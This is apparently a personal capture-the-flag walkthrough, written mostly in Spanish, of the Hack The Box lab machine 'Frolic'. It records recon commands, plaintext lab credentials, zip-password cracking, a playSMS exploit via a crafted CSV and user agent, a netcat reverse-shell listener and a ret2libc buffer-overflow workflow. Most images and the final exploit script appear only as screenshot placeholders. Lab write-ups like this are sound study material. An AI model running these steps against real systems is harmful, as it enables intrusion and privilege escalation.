echo "10.129.1.92 frolic.htb" | sudo tee -a /etc/hosts

nmap -A -p- -oA output 10.129.1.92 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210321111924.png

nmap -sC -sV -O -p- -oA blocky 10.129.1.92

nmap -sU -O -p- -oA blocky-udp 10.129.1.92

nikto -h 10.129.1.92:80

curl 10.129.1.92:9999/dev/backup/ /playsms

Pasted image 20210321133544.png

Pasted image 20210321133640.png

http://10.129.1.92:1880

Pasted image 20210321112637.png

http://10.129.1.92:9999

Pasted image 20210321112721.png

gobuster dir -k -u http://10.129.1.92:9999 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210321113446.png

http://10.129.1.92:9999/admin

Pasted image 20210321113733.png

Vemos en javascript la credencial: superduperlooperpassword_lol

Pasted image 20210321114217.png

http://10.129.1.92:9999/admin/success.html

Pasted image 20210321114445.png

Esto en verdad es un tipo de lenguajes esotericos: Ook!

Podemos usar la siguiente pagina para decodificar dcode.fr to find the plaintext. https://github.com/umbrant/pooky

Pasted image 20210321115332.png

Nothing here check /asdiSIAJJ0QWE9JAS

El sitio contiene un tipo de codigo en texto

Pasted image 20210321115447.png

curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d | xxd

curl 10.10.10.111:9999/backup/password.txt

curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > index.php.zip

file index.php.zip mv index.php.zip out.zip fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt out.zip

Pasted image 20210321132300.png

cat index.php | xxd -r -p

Use xxd to read that back to bytes, which happens to be not only ASCII, but base64 characters:

cat index.php | xxd -r -p | tr -d '\r\n' | base64 -d

https://copy.sh/brainfuck/

Pasted image 20210321133212.png

Pasted image 20210321133245.png

Pasted image 20210321133309.png

admin idkwhatispass

Pasted image 20210321133803.png

https://www.exploit-db.com/exploits/42044/

Pasted image 20220125070324.png

Creamos un archivo backdoor.csv

Pasted image 20220125070741.png

Importamos el backdoor.csv

Pasted image 20220125075714.png

Cambiamos el user agent a

Pasted image 20220125080048.png

Hacemos un reverse shell a nuestra maquina

Pasted image 20220125080819.png

nc -lvnp 443

Pasted image 20220125081034.png

python3 http.server 8080

wget http://frolic.htb:8080/rop

Pasted image 20220125082927.png

chmod +x rop

gdb rop

gef r $(python -c 'print "A"*500')

Pasted image 20220125083519.png

Vemos el resultado en gef

Pasted image 20220125083657.png

pattern create 100

Pasted image 20220125083913.png

patter offset $eip

Pasted image 20220125085649.png

uname -a

cat /proc/sys/kernel/randomize_va_space

Pasted image 20220125085935.png

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -E " sytem@@| exit@@"

Pasted image 20220125090722.png

Creamos el siguiente script en python

Pasted image 20220125100125.png

./exploit.py

Pasted image 20220125100506.png

boxes

copyright©2022 Cu3rv0x all rights reserved